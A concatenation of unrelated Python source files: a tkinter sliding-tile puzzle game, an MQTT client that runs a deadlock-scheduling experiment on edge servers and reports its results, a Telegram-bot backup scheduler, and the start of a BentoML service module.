self.master.bind('<Key-a>', lambda event: self.key_move(0))
self.master.bind('<Key-w>', lambda event: self.key_move(1))
self.master.bind('<Key-d>', lambda event: self.key_move(2))
self.master.bind('<Key-s>', lambda event: self.key_move(3))
def create_tiles(self):
global tileImg, spaceImg, tileImg_a
self.tiles = []
tileImg = tk.PhotoImage(file='GUI/GUI_tile.png')
spaceImg = tk.PhotoImage(file='GUI/GUI_space.png')
tileImg_a = tk.PhotoImage(file='GUI/GUI_tile_a.png')
for i in self.list_play:
tile = button(self,
text='%s'%i,
image=tileImg,
font=self.font,
compound=tk.CENTER,
bd=0,
changebg=False
)
tile.bind('<Enter>', self.tile_bind)
tile.bind('<Leave>', self.tile_bind)
tile.bind('<FocusIn>', self.tile_bind, '+')
tile.bind('<FocusOut>', self.tile_bind, '+')
tile.unbind('<ButtonPress-1>')
tile.unbind('<ButtonRelease-1>')
self.tiles.append(tile)
self.space = tk.Label(self,
image=spaceImg,
bd=0,
fg='black',
bg='white'
)
self.tiles.append(self.space)
self.list_play.append(0)
def arrange_tiles(self):
for i in range(0, self.length):
self.tiles[i].grid(column=i%self.size_x, row=i//self.size_x, padx=0, pady=0)
def generate_pos(self, current_pos):
dests = list(filter(self.check_dest, [current_pos+1, current_pos-1, current_pos+self.size_x, current_pos-self.size_x]))
print('?->%d:' % current_pos, dests)
if len(dests) == 0:
return self.last_dest
else:
dest = choice(dests)
return dest
def move_to(self, dest, check=True, **kw):
if check:
if self.check_dest(dest, **kw):
self.move_to(dest, check=False)
return True
else:
print('%d!->%d' % (self.space_pos, dest))
return False
else:
print('%d->%d' % (self.space_pos, dest))
self.last_dest = self.space_pos
dest_num = self.list_play[dest]
dest_tile = self.tiles[dest]
self.space_pos = dest
self.swap_tiles(self.space, dest_tile)
self.swap_list(0, dest_num, self.list_play)
self.swap_list(self.space, dest_tile, self.tiles)
def check_dest(self, dest, from_space=True, dest_col=None, dest_row=None): ## check the destination of tile or space
space_col, space_row = self.pos_to_col_row(self.space_pos)
if self.gamerule == 0:
verify_statment_1 = lambda dest, dest_col, dest_row, space_col, space_row:\
dest < self.length and dest >= 0 and (dest_col == space_col or dest_row == space_row) and dest != self.last_dest
verify_statment_2 = lambda dest, dest_col, dest_row, space_col, space_row:\
dest < self.length and dest >= 0 and delta in [-1,1,-self.size_x,self.size_x] and (dest_col == space_col or dest_row == space_row)
elif self.gamerule == 1:
verify_statment_1 = lambda dest, dest_col, dest_row, space_col, space_row:\
dest < self.length and dest >= 0 and (dest_col == space_col or dest_row == space_row) and dest != self.last_dest and (not self.barriers[dest])
verify_statment_2 = lambda dest, dest_col, dest_row, space_col, space_row:\
dest < self.length and dest >= 0 and delta in [-1,1,-self.size_x,self.size_x] and (dest_col == space_col or dest_row == space_row) and (not self.barriers[dest])
if from_space:
dest_col, dest_row = self.pos_to_col_row(dest)
## last_dest = self.last_direct
## print('last:%d' % self.last_dest)
# if dest < self.length and dest >= 0 and (dest_col == space_col or dest_row == space_row) and dest != self.last_dest:
if verify_statment_1(dest, dest_col, dest_row, space_col, space_row):
return True
else:
return False
else:
if dest_col == None and dest_row == None:
dest_col, dest_row = self.pos_to_col_row(dest)
delta = dest - self.space_pos
# if dest < self.length and dest >= 0 and delta in [-1,1,-self.size_x,self.size_x] and (dest_col == space_col or dest_row == space_row):
if verify_statment_2(dest, dest_col, dest_row, space_col, space_row):
return True
else:
return False
def key_move(self, key):
print('key move')
if self.count == 0:
self.status = 1
thread = Thread(target=self.timer)
thread.start()
if key == 0: # Key: A Left
dest = self.space_pos - 1
self.key_move_(dest)
elif key == 1: # Key: W Up
dest = self.space_pos - self.size_x
self.key_move_(dest)
elif key == 2: # Key: D Right
dest = self.space_pos + 1
self.key_move_(dest)
elif key == 3: # Key: S Down
dest = self.space_pos + self.size_x
self.key_move_(dest)
def key_move_(self, dest):
if self.check_dest(dest, from_space=False):
self.move_to(dest, check=False)
self.count += 1
self.count_var.set("%d" % self.count)
self.check_win()
def shuffle_tiles(self, times=None, *args):
self.status = 1
self.shuffling = shuffling_dialog(self.master)
self.shuffling.align()
self.shuffling.pro_bar_thread.start()
self.time_thread.start()
while self.count != self.shuffle_times:
dest = self.generate_pos(self.space_pos)
self.move_to(dest, check=False)
self.count += 1
self.count_var.set("%d" % self.count)
self.status = False
self.master.bind('<Button-1>', func=self.click_to_move)
self.bind_keys()
self.shuffling.done()
sleep(0.7)
self.shuffling.back()
self.count = 0
self.count_var.set('0')
def get_tile_pos(self, tile):
return self.co_ords_to_pos([tile.grid_info()['column'], tile.grid_info()['row']])
def click_to_move(self, event):
tile = event.widget
tile_pos = self.get_tile_pos(tile)
if self.move_to(tile_pos, from_space=False):
self.count += 1
self.count_var.set("%d" % self.count)
if self.count == 1:
self.status = 1
thread = Thread(target=self.timer)
thread.start()
self.check_win()
def swap_tiles(self, a, b):
column_b = a.grid_info()['column']
row_b = a.grid_info()['row']
column_a = b.grid_info()['column']
row_a = b.grid_info()['row']
b.grid_configure(column=column_b, row=row_b)
a.grid_configure(column=column_a, row=row_a)
def swap_list(self, a, b, target):
temp = a
index_a = target.index(a)
index_b = target.index(b)
target[index_a] = b
target[index_b] = temp
def pos_to_col_row(self, pos):
return pos % self.size_x, pos // self.size_x # col & row
def co_ords_to_pos(self, coords):
return coords[0] + coords[1] * self.size_x
def vector_to_pos(self, vector):
col, row = self.pos_to_col_row(self.space_pos)
new_coords = (col+vector[0], row+vector[1])
return self.co_ords_to_pos(new_coords)
def tile_bind(self, event):
global tileImg, tileImg_a
action = str(event.type)
tile = event.widget
if action == 'Enter' or action == 'FocusIn':
tile['image'] = tileImg_a
elif action == 'Leave' or action == 'FocusOut':
tile['image'] = tileImg
def timer(self):
time = perf_counter()
while self.status:
self.time_lapsed = perf_counter() - time
self.time_used.set("%.5fs" % self.time_lapsed)
sleep(0.000005)
def disable_tiles(self):
self.master.unbind('<Button-1>')
for i in range(0,8):
key_bindings = ['a', 'w', 'd', 's', 'Left', 'Up', 'Right', 'Down']
self.master.unbind('<Key-%s>' % key_bindings[i])
def write_records(self):
date = get_date()
record = '%s,%s,%.5fs,%d,%d,%s' % (date, self.level, self.time_lapsed, self.count, self.shuffle_times, self.mode)
with open("records.numrcds", 'a') as records:
records.write(record+'\n')
def check_win(self):
if self.list_play == self.list_finish:
self.status = False
self.level = '%dx%d' % (self.size_x, self.size_y)
winner = winner_dialog(self.master, time=self.time_lapsed, move=self.count, level=self.level, shuffle_times=self.shuffle_times, mode=self.mode)
def new_game():
self.master.master.create_select_menu()
self.master.destroy()
winner.new_game.cfg_cmd(new_game)
winner.bind('<Escape>', lambda event: self.master.destroy())
## winner.exit_btn.bind('<Button-1>', lambda event: self.master.destroy())
## winner.new_game.bind('<Button-1>', lambda event: self.master.destroy())
self.disable_tiles()
self.write_records()
def move_space_to_any_dest(self, vector, method=0, *args): ## method = 0 col first
delta_col, delta_row = vector[0], vector[1] ## method = 1 row first
## space_col, space_row = self.pos_to_col_row(self.space_pos)
## delta_col, delta_row = dest_col - space_col, dest_row - space_row
col_move, row_move = 0, 0
dest = self.vector_to_pos(vector)
print('%d=>[%d, %d].%d:%d'%(self.space_pos, delta_col, delta_row, dest, method))
if method:
while row_move != delta_row:
if delta_row < 0:
self.move_to(self.space_pos-self.size_x)
row_move -= 1
else:
self.move_to(self.space_pos+self.size_x, from_space=False)
row_move += 1
## sleep(0.5)
while col_move != delta_col:
if delta_col < 0:
self.move_to(self.space_pos-1, from_space=False)
col_move -= 1
else:
self.move_to(self.space_pos+1, from_space=False)
col_move += 1
## sleep(0.5)
else:
while col_move != delta_col:
if delta_col < 0:
self.move_to(self.space_pos-1, from_space=False)
col_move -= 1
else:
self.move_to(self.space_pos+1, from_space=False)
col_move += 1
## sleep(0.5)
while row_move != delta_row:
if delta_row < 0:
self.move_to(self.space_pos-self.size_x, from_space=False)
row_move -= 1
else:
self.move_to(self.space_pos+self.size_x, from_space=False)
row_move += 1
## sleep(0.5)
## else:
## print('%d!=>[%d, %d].%d:%d'%(self.space_pos, delta_col, delta_row, dest, method))
##
## def chose_method(self, delta_row):
## if delta_row < 0:
## return 0
## else:
## return 1
## def chose_orient(self, delta_col, delta_row):
## if delta_col < 0 and delta_row < 0:
## return ''
## elif delta_col
def move_near_dest(self, orient, delta_pos):
'''
move space to the one of the positions that is close to the dest
four orientations: 'up', 'down', 'right' and 'left'
'''
## method = self.chose_method(delta_pos[1])
## if delta_pos
## if orient == 'up':
## if delta_pos[0] == 0:
## pos = self.space_pos
#### index = choice([0,1])
## new_pos_list = list(filter(self.check_dest, [pos+1, pos-1]))
## new_pos = choice(new_pos_list)
## print('%d:%s'%(new_pos, str(new_pos_list)))
#### new_pos = new_pos_list[index]
## self.move_to(new_pos)
## delta_pos[0] += pos - new_pos
## delta_pos[1] -= 1
## self.move_space_to_any_dest(delta_pos, method=1)
## elif orient == 'down':
## delta_pos[1] += 1
## self.move_space_to_any_dest(delta_pos, method=1)
## elif orient == 'right':
## delta_pos[0] += 1
## self.move_space_to_any_dest(delta_pos, method=0)
## elif orient == 'left':
## delta_pos[0] -= 1
## self.move_space_to_any_dest(delta_pos, method=0)
signs = [-1,1]
directs = [self.size_x, 1]
up = orient == 'up'
down = orient == 'down'
right = orient == 'right'
sign = down or right
condi = (up or down)
## if up or down:
print(orient)
if delta_pos[not condi] == 0:
pos = self.space_pos
## index = choice([0,1])
new_pos_list = list(filter(self.check_dest, [pos+directs[condi], pos-directs[condi]]))
new_pos = choice(new_pos_list)
print('%d:%s'%(new_pos, str(new_pos_list)))
## new_pos = new_pos_list[index]
self.move_to(new_pos, check=False)
delta_pos[not condi] += (pos - new_pos) / directs[condi]
delta_pos[condi] += signs[sign]
dest = self.vector_to_pos(delta_pos)
self.move_space_to_any_dest(delta_pos, method=condi)
## else:
## if delta_pos[1] == 0:
def move_tile_vertically(self, up=True):
if up:
self.move_to(self.space_pos+self.size_x)
self.move_to(self.space_pos+1)
self.move_to(self.space_pos-self.size_x)
self.move_to(self.space_pos-self.size_x)
self.move_to(self.space_pos-1)
else:
self.move_to(self.space_pos-self.size_x)
self.move_to(self.space_pos+1)
self.move_to(self.space_pos+self.size_x)
self.move_to(self.space_pos+self.size_x)
self.move_to(self.space_pos-1)
def move_tile_horizontally(self, right=True):
if right:
self.move_to(self.space_pos-1)
self.move_to(self.space_pos-self.size_x)
self.move_to(self.space_pos+1)
self.move_to(self.space_pos+1)
self.move_to(self.space_pos+self.size_x)
else:
self.move_to(self.space_pos+1)
self.move_to(self.space_pos-self.size_x)
self.move_to(self.space_pos-1)
self.move_to(self.space_pos-1)
self.move_to(self.space_pos+self.size_x)
def move_tile_to_any_pos(self, tile_num, dest, *args):
dest_col, dest_row = self.pos_to_col_row(dest)
tile = self.tiles[tile_num]
tile_col, tile_row = tile.grid_info()['column'], tile.grid_info()['row']
delta_col, delta_row = dest_col - tile_col, dest_row - tile_row
col_move, row_move = 0, 0
def create_numski(master, size, shuffle_times):
app = numski(size=size, shuffle_times=shuffle_times, master=master)
app.pack()
def test(event):
print('Press', event.keycode)
def create_thread(target, args):
t = Thread(target=target, args=args)
t.start()
if __name__ == '__main__':
root = tk.Tk()
app = numski(master=root, size=(8,7), mode='Test', shuffle_times=20)
app.pack()
## thread = Thread(target=app.move_space_to_any_dest, args=(5,1))
## thread.start()
## app.move_space_to_any_dest(5)
## app.move_tile_to_any_pos(1, 1)
app.move_space_to_any_dest([-4, 0], method=1)
## sleep(2)
app.move_near_dest('down', [0,-5])
app.move_tile_vertically(up=False)
app.move_tile_vertically(up=False)
app.move_tile_vertically(up=False)
app.move_tile_vertically(up=False)
app.move_near_dest('right', [0,-1])
app.move_tile_horizontally()
app.barrier_rule_init()
app.barriers[54] = 1
app.barriers[55] = 1
app.barriers[20] = 1
# app.master.bind('<Button-1>', func=app.click_to_move)
# app.shuffle_thread.start()
root.mainloop()
|
client.py
|
#!/usr/bin/env python3
import matplotlib
import socket
import os
import ast
import random as r
import time
import datetime as dt
import subprocess as sp
import paho.mqtt.client as mqtt
import matplotlib.pyplot as plt
from drawnow import *
import smtplib
import config
import pickle
import data_homo as homo
import data_hetero as hetero
import argparse
from threading import Thread
import threading
matplotlib.use('TkAgg')
shared_resource_lock = threading.Lock()
record = [] # [({tasks}, {waiting time}), hostname] records the task list and execution and waiting time and host sent
run = 1
_tasks = {'t1': {'wcet': 3, 'period': 20, 'deadline': 15},
't2': {'wcet': 1, 'period': 5, 'deadline': 4},
't3': {'wcet': 2, 'period': 10, 'deadline': 8},
't4': {'wcet': 1, 'period': 10, 'deadline': 9},
't5': {'wcet': 3, 'period': 15, 'deadline': 12}
}
# mat = {'p0': ['cpu', 'mem', 'storage']}
_need = {
't1': [7, 4, 3],
't2': [1, 2, 2],
't3': [6, 0, 0],
't4': [0, 1, 1],
't5': [4, 3, 1]
}
allocation = {
't1': [0, 1, 0],
't2': [2, 0, 0],
't3': [3, 0, 2],
't4': [2, 1, 1],
't5': [0, 0, 2]
}
'''
ax.annotate('local max', xy=(2, 1), xytext=(3, 1.5),
arrowprops=dict(facecolor='black', shrink=0.05),
)
'''
thread_record = []
task_record = {} # records tasks start time and finish time {seq_no:{task:[duration, start_time,finish_time]}}
# idea for task naming # client-id_task-no_task-id client id = 11, task no=> sequence no, task id => t1
tasks_executed_on_time = 0
tasks_not_executed_on_time = 0
timely_ = {'local': 0, 'mec': 0, 'cloud': 0}
untimely_ = {'local': 0, 'mec': 0, 'cloud': 0}
filename = {2: 'rms+bankers',
3: 'edf+bankers',
7: 'rms+wound_wait',
10: 'rms+wait_die',
12: 'edf+wound_wait',
16: 'edf+wait_die'}
plt.ion()
fig = plt.figure(frameon=True)
ax1 = fig.add_subplot(211)
ax2 = fig.add_subplot(223)
ax3 = fig.add_subplot(224)
def auto_value(no):
if no < 5:
return no
elif no < 10:
return no - 3
elif no < 50:
return no - 6
elif no < 150:
return no - 30
elif no < 800:
return no - 70
elif no < 2000:
return no - 200
else:
return no - 400
def plot_performance():
name = ['Timely', 'Untimely']
ypos = ([0, 1])
total = tasks_executed_on_time + tasks_not_executed_on_time
if tasks_executed_on_time > 0:
timely = round((tasks_executed_on_time / total) * 100, 2)
else:
timely = 0
if tasks_not_executed_on_time > 0:
untimely = round((tasks_not_executed_on_time / total) * 100, 2)
else:
untimely = 0
values = [tasks_executed_on_time, tasks_not_executed_on_time]
ax1.set_xticks(ypos)
ax1.set_xticklabels(name)
ax1.bar(ypos, values, align='center', color=['g', 'm'], alpha=0.5)
ax1.set_title('Task execution Time record')
dis = 'Seq: {}\nTotal Tasks: {}\ntotal: {}'.format(seq, total, total_split_task)
# ax1.annotate(dis, xy=(2, 1), xytext=(3, 1.5))
ax1.text(1, auto_value(tasks_executed_on_time), dis, size=10, rotation=0,
ha="center", va="center", bbox=dict(boxstyle="round", ec=(1., 0.7, 0.7), fc=(1., 0.8, 0.8), ))
ax1.text(-0.1, tasks_executed_on_time, '{}, {}%'.format(tasks_executed_on_time, timely), size=10, rotation=0,
ha="center", va="center", bbox=dict(boxstyle="round", ec=(1., 0.5, 0.5), fc=(1., 0.8, 0.8), ))
ax1.text(0.99, tasks_not_executed_on_time, '{}, {}%'.format(tasks_not_executed_on_time, untimely),
size=10, rotation=0,
ha="center", va="center", bbox=dict(boxstyle="round", ec=(1., 0.5, 0.5), fc=(1., 0.8, 0.8), ))
plt.subplot(ax1)
d = [[timely_, ax2, 'Timely Details'], [untimely_, ax3, 'UnTimely Details']]
for info in d:
plot_details(ax=info[1], data=info[0], title=info[2])
fig.suptitle('MEC Performance During Deadlock Experiment')
def plot_details(ax, data, title):
name = ['Local', 'MEC', 'Cloud']
ypos = ([0, 1, 2])
data_per = {}
total = 0
for i in data:
total += data[i]
for i in data:
if data[i] == 0:
data_per[i] = 0
else:
data_per[i] = round((data[i] / total) * 100, 2)
values = list(data.values())
ax.set_xticks(ypos)
ax.set_xticklabels(name)
ax.bar(ypos, values, align='center', color=['g', 'b', 'r'], alpha=0.5)
ax.set_title(title)
g = -0.1
for i in data:
ax.text(g, data[i], '{}, {}%'.format(data[i], data_per[i]), size=10, rotation=0,
ha="center", va="center", bbox=dict(boxstyle="round", ec=(1., 0.5, 0.5), fc=(1., 0.8, 0.8), ))
g += 1
plt.subplot(ax)
def get_time():
_time_ = dt.datetime.utcnow()
return _time_
def gosh_dist(_range):
return ((23 ** r.randrange(1, 1331)) % r.randrange(1, 1777)) % _range
def on_connect_task(connect_client, userdata, flags, rc):
# print("Connected with Code :" +str(rc))
# Subscribe Topic from here
connect_client.subscribe(task_topic, qos=0)
u_time = {'local': [], 'mec': [], 'cloud': []}
t_time = {'local': [], 'mec': [], 'cloud': []}
# Callback Function on Receiving the Subscribed Topic/Message
def on_receive_task(message_client, userdata, msg):
global tasks_executed_on_time
global tasks_not_executed_on_time
# print the message received from the subscribed topic
data = str(msg.payload, 'utf-8')
received_task = ast.literal_eval(data) # {task_id: ['2020', '04', '09', '14', '38', '39', '627060', '<mec>']}
for i in received_task:
tk = '.'.join(i.split('.')[:4])
# print('tk: {}'.format(tk))
seq_no = int(tk.split('.')[3]) # naming tasks = task_id.node_id.client_id.sequence_no =>t2.110.170.10
k = task_record[seq_no][tk] # task_record= {seq_no:{task:[duration,start_time,finish_time]}}
if len(k) < 3: # check if i have received a task with the same id
a = received_task[i]
k.append(dt.datetime(int(a[0]), int(a[1]),
int(a[2]), int(a[3]),
int(a[4]), int(a[5]),
int(a[6])))
p = k[2] - k[1]
if p < k[0]:
tasks_executed_on_time += 1
timely_[a[7]] += 1
t_time[a[7]].append(p.seconds + p.microseconds * (10 ** -6))
else:
tasks_not_executed_on_time += 1
untimely_[a[7]] += 1
u_time[a[7]].append(p.seconds + p.microseconds * (10 ** -6))
elif len(k) == 3:
a = received_task[i]
t = dt.datetime(int(a[0]), int(a[1]),
int(a[2]), int(a[3]),
int(a[4]), int(a[5]),
int(a[6]))
p = t - k[1]
if p < k[0]:
tasks_executed_on_time += 1
timely_[a[7]] += 1
t_time[a[7]].append(p.seconds + p.microseconds * (10 ** -6))
else:
tasks_not_executed_on_time += 1
untimely_[a[7]] += 1
u_time[a[7]].append(p.seconds + p.microseconds * (10 ** -6))
def receive_mec_start(stop):
global task_topic
global task_client
username = 'mec'
password = 'password'
broker_port_no = 1883
broker_ip = '192.168.122.111'
task_topic = client_id(ip_address())
task_client = mqtt.Client()
task_client.on_connect = on_connect_task
task_client.on_message = on_receive_task
task_client.username_pw_set(username, password)
task_client.connect(broker_ip, broker_port_no, 60)
task_client.loop_start()
while True:
if stop():
task_client.loop_stop()
task_client.disconnect()
break
def ip_address():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
def get_hostname():
cmd = ['cat /etc/hostname']
hostname = str(sp.check_output(cmd, shell=True), 'utf-8')[0:-1]
return hostname
def send_email(msg):
try:
server = smtplib.SMTP_SSL('smtp.gmail.com')
server.ehlo()
server.login(config.email_address, config.password)
subject = 'Deadlock results {} {} {}'.format(filename[algo_id], get_hostname(), send_path)
# msg = 'Attendance done for {}'.format(_timer)
_message = 'Subject: {}\n\n{}\n\n SENT BY RIHANNA \n\n'.format(subject, msg)
server.sendmail(config.email_address, config.send_email, _message)
server.quit()
print("Email sent!")
except Exception as e:
print(e)
def client_id(client_ip):
_id = client_ip.split('.')[-1]
if len(_id) == 1:
return '00' + _id
elif len(_id) == 2:
return '0' + _id
else:
return _id
total_task_sent = 0
total_split_task = 0
task_dist = {1: 0, 2: 0, 3: 0}
def task_details(tasks):
global task_dist, total_task_sent, total_split_task
total_task_sent += len(tasks)
for task in tasks:
total_split_task += tasks[task]['wcet']
task_dist[tasks[task]['wcet']] += 1
def name_task(task_list, node_id, seq_no):
# naming nomenclature of tasks = task_id.node_id.client_id.sequence_no =>t2.110.170.10
# returns task list and waiting_time with proper identification
return {i + '.' + str(node_id) + '.' + client_id_ + '.' + str(seq_no): task_list[0][i] for i in task_list[0]}, \
{k + '.' + str(node_id) + '.' + client_id_ + '.' + str(seq_no): task_list[1][k] for k in task_list[1]}
def namestr(obj):
namespace = globals()
return [name for name in namespace if namespace[name] is obj]
def split_list(data, _id_):
if _id_ == 4: # 866
return data[:866]
if _id_ == 5: # 867
return data[866:1733]
if _id_ == 6: # 867
return data[1733:]
def save_data():
result = f"\ntimely{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {tasks_executed_on_time} " \
f"\nuntimely{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {tasks_not_executed_on_time}" \
f"\nrecord{len(hosts)} = {record} \nhost_names{len(hosts)} = {host_dict}" \
f"\n{namestr(total_task_sent)[0]}{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {total_task_sent}" \
f"\n{namestr(total_split_task)[0]}{get_hostname()[-1]}_{algo_id}_{len(hosts)} = " \
f"{total_split_task} " \
f"\n{namestr(task_dist)[0]}{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {task_dist}\n" \
f"\n{namestr(untimely_)[0]}{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {untimely_}" \
f"\n{namestr(timely_)[0]}{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {timely_}" \
f"\nu_time{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {u_time}" \
f"\nt_time{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {t_time}"
list_result = [
f"\ntimely{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {tasks_executed_on_time} ",
f"\nuntimely{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {tasks_not_executed_on_time}",
f"\nrecord{len(hosts)} = {record} ",
f"\nhost_names{len(hosts)} = {host_dict}",
f"\n{namestr(total_task_sent)[0]}{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {total_task_sent}"
f"\n{namestr(total_split_task)[0]}{get_hostname()[-1]}_{algo_id}_{len(hosts)} = "
f"{total_split_task} "
f"\n{namestr(task_dist)[0]}{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {task_dist}\n",
f"\n{namestr(timely_)[0]}{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {timely_}",
f"\n{namestr(untimely_)[0]}{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {untimely_}",
f"\nu_time{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {u_time}",
f"\nt_time{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {t_time}"
]
path_ = 'data/raw/'
if os.path.exists(path_):
cmd = f"echo '' > {path_}c{get_hostname()[-1]}_{algo_id}_{len(hosts)}datal.py"
os.system(cmd)
cmd = f"echo '' > {path_}c{get_hostname()[-1]}_{algo_id}_{len(hosts)}datap.py"
os.system(cmd)
else:
os.system(f'mkdir -p {path_}')
cmd = f"echo '' > {path_}c{get_hostname()[-1]}_{algo_id}_{len(hosts)}datal.py"
os.system(cmd)
cmd = f"echo '' > {path_}c{get_hostname()[-1]}_{algo_id}_{len(hosts)}datap.py"
os.system(cmd)
file_ = open(f'{path_}c{get_hostname()[-1]}_{algo_id}_{len(hosts)}datap.py', 'w')
for i in list_result:
cmd = f'echo "{i}" >> {path_}c{get_hostname()[-1]}_{algo_id}_{len(hosts)}datal.py'
os.system(cmd)
file_.write(i)
file_.close()
sp.run(
["scp", f"{path_}c{get_hostname()[-1]}_{algo_id}_{len(hosts)}datap.py",
f"mec@{ho['osboxes-0']}:{send_path}"])
send_email(result)
def run_me(mec_dict, algo_id_, exp_kind): # get_mec_details(mec_dict, algo_id_) homo/hetero
global record
global client_id_
global seq
os.system('clear')
print("================== Welcome to Client Platform ===================")
get_mec_details(mec_dict=mec_dict, algo_id_=algo_id_) # get_mec_details(mec_dict, algo_id_)
client_id_ = client_id(ip_address())
stop = False
redeem_task = Thread(target=receive_mec_start, args=(lambda: stop,))
# redeem_task.daemon = True
redeem_task.start()
time.sleep(2)
exp_type = {'homo': homo, 'hetero': hetero}
dst = exp_type[exp_kind]
print('Client is connected to servers: {}'.format(hosts))
data = {4: dst.mec4, 7: dst.mec7, 10: dst.mec10}
task_bank = {4: dst.data_list4, 5: dst.data_list5, 6: dst.data_list6}
cmd = ['hostname']
host_id = str(sp.check_output(cmd, shell=True), 'utf-8')[-2]
t_list = task_bank[int(host_id)]
print('experiment started!')
_data_ = split_list(data[len(hosts)], int(host_id))
for i in range(len(_data_)):
seq = i
rand_host = hosts[int(_data_[i]) - 1] # host selection using generated gausian distribution
_task_ = t_list[i] # tasks, waiting time
_tasks_list = name_task(_task_, client_id(rand_host), i) # id's tasks => ({tasks}, {waiting time})
task_details(_tasks_list[0])
record.append([_tasks_list, host_dict[rand_host]])
for task in _tasks_list[0]:
sec = dt.timedelta(seconds=_task_[1][task[:2]][1])
if i not in task_record: # task_record= {seq_no:{task:[duration,start_time,finish_time]}}
task_record[i] = {task: [sec, get_time()]}
else:
task_record[i][task] = [sec, get_time()]
# client(_tasks_list, rand_host)
task_client.publish(client_id(rand_host), "t {}".format(_tasks_list))
print("Sent {} to {} node_id {} \n\n".format(_tasks_list, rand_host, client_id(rand_host)))
drawnow(plot_performance)
time.sleep(3)
time.sleep(r.uniform(0, 30))
# messenger.publish(topic=control_topic, data=pickle.dumps(['client finish', host_id]))
task_client.publish('control/control', pickle.dumps(['client finish', host_id]))
print('Client Finished')
time.sleep(150)
print('\nProgramme terminating')
save_data()
time.sleep(1)
cmd = 'kill -9 {}'.format(os.getpid())
os.system(cmd)
def get_mec_details(mec_dict, algo_id_):
global hosts
global host_dict
global algo_id
global ho
ho = mec_dict # {hostname: ip}
algo_id = algo_id_
hosts = sorted(list(ho.values())) # list of Ips
host_dict = dict(zip(list(ho.values()), list(ho.keys())))
def main():
global send_path
# (mec_dict, algo_id_, exp_kind, send_path)
parser = argparse.ArgumentParser() # --hosts= --al_id= --kind= --s_path=
parser.add_argument('--hosts', type=str, help="{hostname: 'ip address', ...} of all mec")
parser.add_argument('--al_id', type=int, help='algorithm id')
parser.add_argument('--kind', type=str, help="kind of experiment, homo or hetero")
parser.add_argument('--s_path', type=str, default='/home/mec/result/python', help='Path to send result to')
args = parser.parse_args()
h_hosts = ast.literal_eval(args.hosts)
send_path = args.s_path
run_me(mec_dict=h_hosts, algo_id_=args.al_id, exp_kind=args.kind)
if __name__ == '__main__':
main()
|
backups.py
|
# Copyright (C) 2018-2020 Amano Team <contact@amanoteam.com>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import os
import time
import schedule
from datetime import datetime
from utils import backup_sources
from multiprocessing import Process
from config import backups_chat, backup_hours, na_bot
def backup_func():
cstrftime = datetime.now().strftime('%d/%m/%Y - %H:%M:%S')
file = backup_sources()
try:
na_bot.sendDocument(backups_chat, open(file, 'rb'), caption="📅 " + cstrftime + "\n_Auto generated._", parse_mode='Markdown')
finally:
os.remove(file)
def backup_scheduler(target):
for hour in backup_hours:
schedule.every().day.at(hour).do(target)
while True:
schedule.run_pending()
time.sleep(5)
def backup_service():
p = Process(target=backup_scheduler, args=(backup_func,))
p.start()
|
__init__.py
|
# Copyright 2019 Atalaya Tech, Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from multipledispatch import dispatch
import inspect
import logging
import multiprocessing
import os
import re
import subprocess
import sys
import tempfile
import threading
import uuid
from datetime import datetime
from dependency_injector.wiring import Provide, inject
from typing import List
from bentoml.adapters import BaseInputAdapter, BaseOutputAdapter, DefaultOutput
from bentoml.configuration.containers import BentoMLContainer
from bentoml.exceptions import BentoMLException, InvalidArgument, NotFound
from bentoml.saved_bundle import save_to_dir
from bentoml.saved_bundle.config import (
DEFAULT_MAX_BATCH_SIZE,
DEFAULT_MAX_LATENCY,
SavedBundleConfig,
)
from bentoml.saved_bundle.pip_pkg import seek_pip_packages
from bentoml.service.artifacts import ArtifactCollection, BentoServiceArtifact
from bentoml.service.env import BentoServiceEnv
from bentoml.service.inference_api import InferenceAPI
from bentoml.utils.hybridmethod import hybridmethod
ARTIFACTS_DIR_NAME = "artifacts"
BENTOML_RESERVED_API_NAMES = [
"index",
"swagger",
"docs",
"healthz",
"metrics",
"feedback",
]
logger = logging.getLogger(__name__)
prediction_logger = logging.getLogger("bentoml.prediction")
def validate_inference_api_name(api_name: str):
if not api_name.isidentifier():
raise InvalidArgument(
"Invalid API name: '{}', a valid identifier may only contain letters,"
" numbers, underscores and not starting with a number.".format(api_name)
)
if api_name in BENTOML_RESERVED_API_NAMES:
raise InvalidArgument(
